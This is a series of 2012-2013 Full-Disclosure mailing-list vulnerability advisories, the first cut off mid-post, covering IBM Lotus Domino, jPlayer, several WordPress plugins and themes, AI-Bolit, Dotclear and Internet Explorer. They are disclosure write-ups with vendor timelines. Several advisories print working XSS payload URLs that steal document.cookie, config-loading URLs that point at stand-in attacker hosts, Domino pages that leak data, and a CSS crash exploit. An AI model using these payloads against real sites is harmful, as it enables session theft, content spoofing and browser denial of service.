http://site/statrep.nsf http://site/webadmin.nsf http://site/web/war.nsf There are two variants of login form: Basic Authentication (I found it during pentest already in 2008) and form-based authentication (I found it during pentest in 2012, alongside with the first variant). In both cases there is no protection against Brute Force. Insufficient Authentication (WASC-01): Unprivileged user (with any account at the site, access to which can be received via Brute Force vulnerability) has access to the next pages: https://site/names.nsf - leakage of information about all users (names, surnames, logins, e-mails and other personal information and settings) https://site/admin4.nsf - leakage of information about administration requests, including personal information (names, surnames, logins, etc.) https://site/catalog.nsf - leakage of important information about files at the server, about installed applications and their settings (Application Catalog), including personal information (names, surnames, logins, etc.) https://site/events4.nsf - leakage of information about events (Monitoring Configuration) After receiving access to names.nsf, it's possible to use Information Leakage vulnerability, which found by Leandro Meiners in 2005 (for getting password hashes) and which is still not fixed. IBM hasn't fixed it in default configuration, but only recommended to remove hash field from profiles or to use salted hashes. My client has used exactly Lotus salted hashes and it hasn't helped (99% of hashes were picked up, including admin's one). Timeline: Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html). - During 16.05-20.05.2012 I've wrote announcements about multiple vulnerabilities in IBM software at my site. - During 16.05-20.05.2012 I've wrote five advisories via contact form at IBM site. - At 31.05.2012 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products). - At 18.08.2012 I've reminded IBM about these holes and gave enough arguments to fix them. - At 14.04.2013 I've again remind IBM about these holes. - At 23.04.2013 IBM answered that they would not fix these holes. - At 26.04.2013 I've disclosed these vulnerabilities at my site (http://websecurity.com.ua/5829/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with jPlayer
Hello list! I want to inform you about multiple vulnerabilities in multiple plugins for WordPress with jPlayer. These are Cross-Site Scripting and Content Spoofing and vulnerabilities. I've wrote about vulnerabilities in jPlayer earlier (http://seclists.org/fulldisclosure/2013/Apr/192). jPlayer is used in multiple web applications and particularly in multiple plugins for WordPress. Google dork for jPlayer shows 32000 results and for WP plugins with it shows 239000 (inurl:Jplayer.swf inurl:/wp-content/plugins/). Among them are MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer and WP jPlayer. These five plugins placed in WordPress plugins catalog with tag "jplayer", But there are other vulnerable plugins for WP with Jplayer.swf (which can be found with above-mentioned Google dork). All developers of these plugins, the same as developers of all other web applications with jPlayer, need to update it in their software. - Affected products: - MP3-jPlayer 1.8.3 and previous versions. Haiku minimalist audio player 1.0.0 and previous versions. Background Music 1.0 and previous versions. Jammer 0.2 and previous versions. WP jPlayer 0.1 and previous versions. Vulnerabilities are in jPlayer versions before 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to mentioned XSS, except CS via JS and XSS via JS callbacks. Also there are other bypass methods which work in version 2.3.0, but the developers haven't fixed them besides attack via alert. About that I've wrote to developers already in March and reminded again. So wait for new version with fixing of these vulnerabilities. - Affected vendors: - Plugins' pages at WordPress plugins catalog: MP3-jPlayer http://wordpress.org/extend/plugins/mp3-jplayer/ Haiku minimalist audio player http://wordpress.org/extend/plugins/haiku-minimalist-audio-player/ Background Music http://wordpress.org/extend/plugins/background-music/ Jammer http://wordpress.org/extend/plugins/jammer/ WP jPlayer http://wordpress.org/extend/plugins/wp-jplayer/ -- Details: -- Cross-Site Scripting (WASC-08): In different versions of jPlayer there are different XSS vulnerabilities (see in the first advisory) and different WP plugins has different versions of jPlayer. MP3-jPlayer: http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E Haiku minimalist audio player: http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E Background Music: http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E Jammer: http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E WP jPlayer: http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// Content Spoofing (WASC-12): It's possible to conduct CS (inclusion of audio/video files from external resources) via JS and XSS via JS callbacks. This requires HTML Injection vulnerability at the site. The attack is similar to XSS attacks via callbacks in JW Player (http://securityvulns.ru/docs28176.html). Because this attack vector requires separate vulnerability at target site to conduct CS and XSS attacks with using of jPlayer, the developers didn't do anything to fix it. The same as developers JW Player. So protection from this attack scenario lies solely on web sites owners. Timeline: 2013.03.19 - informed developers of jPlayer. 2013.04.20 - developers released jPlayer 2.3.0 (http://www.jplayer.org/2.3.0/release-notes/) and informed me. 2013.04.21 - informed developers of MP3-jPlayer, Haiku minimalist audio player and WP jPlayer (from five developers only these three had contact information). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in jPlayer
Hello list! I want to inform you about multiple vulnerabilities in jPlayer. These are Cross-Site Scripting and Content Spoofing and vulnerabilities in jPlayer. Which is used at tens thousands of web sites and in multiple web applications. - Affected products: - Vulnerable are versions before jPlayer 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to mentioned XSS, except CS via JS and XSS via JS callbacks. Also there are other bypass methods which work in version 2.3.0, but the developers haven't fixed them besides attack via alert. About that I've wrote to developers already in March and reminded again. So wait for new version with fixing of these vulnerabilities. - Affected vendors: - Happyworm http://www.jplayer.org -- Details: -- Cross-Site Scripting (WASC-08): In different versions of jPlayer there are different XSS vulnerabilities. 0.2.1 - 1.2.0: http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// 2.0.0: http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// 2.1.0: http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// In version 2.2.0 these XSS vulnerabilities were fixed (the developers was informed about hole in jQuery parameter and made a fix, which protected from both attacks). But Malte Batram (in version 2.2.19) and I (in version 2.2.20) have found new ones. 2.2.0 - 2.2.19 (and previous versions): Attack works in Firefox (all versions and browsers on Gecko engine), IE6 and Opera 10.62. http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E 2.2.20 - 2.2.22 (and previous versions): http:/site/Jplayer.swf?jQuery=alert&id=XSS Content Spoofing (WASC-12): It's possible to conduct CS (inclusion of audio/video files from external resources) via JS and XSS via JS callbacks. This requires HTML Injection vulnerability at the site. The attack is similar to XSS attacks via callbacks in JW Player (http://securityvulns.ru/docs28176.html). Because this attack vector requires separate vulnerability at target site to conduct CS and XSS attacks with using of jPlayer, the developers didn't do anything to fix it. The same as developers JW Player. So protection from this attack scenario lies solely on web sites owners. Timeline: 2013.01.31 - found vulnerabilities in jPlayer at multiple web sites (in version 2.1.0). 2013.03.14 - announced at my site. 2013.03.19 - informed developers. 2013.03.19-30 - discussed with developers different vulnerabilities in different versions of jPlayer and at their sites. 2013.03.21 - developers was informed by Malte Batram's about XSS hole in 2.2.19. 2013.03.21 - developers fixed Malte's XSS hole in 2.2.20 in github (CVE-2013-1942). 2013.03.22 - informed developers about new hole, which works in 2.2.20. 2013.03.23 - sent details of new XSS and warned about possibility for other XSS attacks and gave recommendations about proper fixing of XSS to prevent any future XSS. 2013.03.30 - reminded developers about last hole. 2013.04.12 - developers fixed my XSS hole in 2.2.23 in github. 2013.04.20 - developers released jPlayer 2.3.0 (http://www.jplayer.org/2.3.0/release-notes/) and informed me. 2013.04.20 - disclosed at my site about jPlayer (http://websecurity.com.ua/6379/). 2013.04.21 - tested version 2.3.0 and found that developers fixed only one attack vector and didn't make complete fix, as I recommended in March, so I reminded them and sent them examples of two new XSS. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in Colormix theme for WordPress
Hello list! Last year I've disclosed vulnerabilities in JW Player and in RokBox. Which were fixed by the developers - JW Player developers fixed one hole and promised to fix others later and RokBox fixed all holes (but it was questionable how they fixed holes related to JW Player). In December I've wrote about 47 RocketTheme's themes for WordPress (which contain RokBox). Besides their themes I've found in December similar vulnerabilities in multiple themes of other developers (including custom themes). Now I'll inform you about multiple vulnerabilities in Colormix theme for WordPress. These are Cross-Site Scripting, Content Spoofing and Full path disclosure vulnerabilities. - Affected products: - Affected all versions of Colormix theme for WordPress. Other themes of this developer can be vulnerable as well. - Affected vendors: - Wordpress Themes Park http://www.wordpressthemespark.com -- Details: -- XSS (WASC-08): http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml 1.xml 1.flv 1.jpg Content Spoofing (WASC-12): http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site Full path disclosure (WASC-13): There are FPD In folder http://site/wp-content/themes/colormix/ in index.php and many other php-files of theme. Timeline: 2012.05.29 - informed developers of JW Player. 2012.08.18 - informed developers about new holes in JW Player Pro. 2012.08.28 - informed developers of Rokbox. 2012.12.14 - disclosed at my site about Rokbox. 2012.12.23 - disclosed to the lists the first part of vulnerable themes by RocketTheme for WordPress. 2012.12.30 - disclosed to the lists the second part of vulnerable themes by RocketTheme for WordPress. 2013.04.18 - disclosed at my site about Colormix theme (http://websecurity.com.ua/6457/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in AI-Bolit
Hello list! These are Brute Force and Information Leakage vulnerabilities in AI-Bolit. This is security web application. - Affected products: - Vulnerable are all versions of AI-Bolit. In version 20121014 the filename format was changed (with adding date and time). Which is not enough to protect from guessing, as I stated to the developer. He promised to fix these vulnerabilities. After my recommendations, in version 20130201 the developer added protection against Information Leakage (forbad indexing reports by search engines and added random number to the filename). But software is still vulnerable to Brute Force. -- Details: -- Brute Force (WASC-11): http://site/ai-bolit.php?p=1 Information Leakage (WASC-13): http://site/AI-BOLIT-REPORT.html http://site/AI-BOLIT-REPORT--.html (since version 20121014) Leakage of reports with stats and FPD. Also these reports are indexed by search engines. If there is mentioned backdoors on the site in report, then after getting access to report, it's possible to get to know about backdoors and hack web site with using them. Timeline: 2013.01.22 - announced at my site. 2013.01.22 - informed developer about vulnerabilities. 2013.02.01 - developer released new version with protection against Information Leakage. 2013.04.13 - disclosed at my site (http://websecurity.com.ua/6271/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and CS vulnerabilities in Dotclear
Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in Dotclear. CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf and player_mp3.swf. File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in Swfupload in November 2012 (http://securityvulns.ru/docs28759.html). SecurityVulns ID: 12719 CVE: CVE-2012-3414 File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV Player in August 2011 (http://securityvulns.ru/docs26894.html). SecurityVulns ID: 11877 File player_mp3.swf it's mp3 player similar to FLV Player (made by the same developer). - Affected products: - Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions. In version Dotclear 2.5 the developers fixed vulnerabilities but not effectively: 1) all three vulnerable flash-files are exist in engine (so no need to take them from repository or from web sites for using in own projects, since these are vulnerable versions of flashes); 2) the developers changed swfupload.swf in Dotclear 2.5 on previous version, but this one is still vulnerable to all XSS and CS holes; 3) for of direct access to flash-files (via .htaccess), to prevent using of their vulnerabilities, works only in Apache, but not in other web servers (so web sites on them are vulnerable). -- Details: -- Cross-Site Scripting (WASC-08): http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Cross-Site Scripting (WASC-08): http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie) http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml File xss.xml: http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt File xss.txt: onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) Code will execute after click. It's strictly social XSS. Content Spoofing (WASC-12): http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E It's possible to inject text, images and html (e.g. for link injection). http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3 Timeline: 2013.01.10 - announced at my site. 2013.01.14 - informed developers about vulnerabilities in all three flashes. 2013.03.16 - released Dotclear 2.5. 2013.04.10-12 - wrote 4 additional letters to developers with reminding, with drawing attention on ineffective fixing of the holes and with persuading them to fix the holes correctly. 2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS vulnerability in Internet Explorer (access violation)
Hello list! I want to warn you about Denial of Service vulnerabilities in Internet Explorer. This is access violation. I've made the exploit and tested this vulnerability at 13.02.2013. This exploit is based on video by TheSecuritylab for IE7. As I've tested, it also works in IE6 and IE8. - Affected products: - Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous versions of these browsers. IE9 is not affected (Microsoft fixed this hole). -- Details: -- Denial of Service (WASC-10): Browser crashes at recursive including of css-file. It happens due to access violation (aka segmentation fault) in iexplore.exe. Also it's important for the crash that css-file has short name. For exploit to work in IE6 it's needed to refresh the page. PoC / Exploit: IE_DoS_Exploit.html dos.css @import url("dos.css"); @import url("dos.css"); @import url("dos.css"); @import url("dos.css"); @import url("dos.css"); Video PoC: Internet Explorer CSS Denial of Service Vulnerability http://www.youtube.com/watch?v=eihStRWnrX4 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/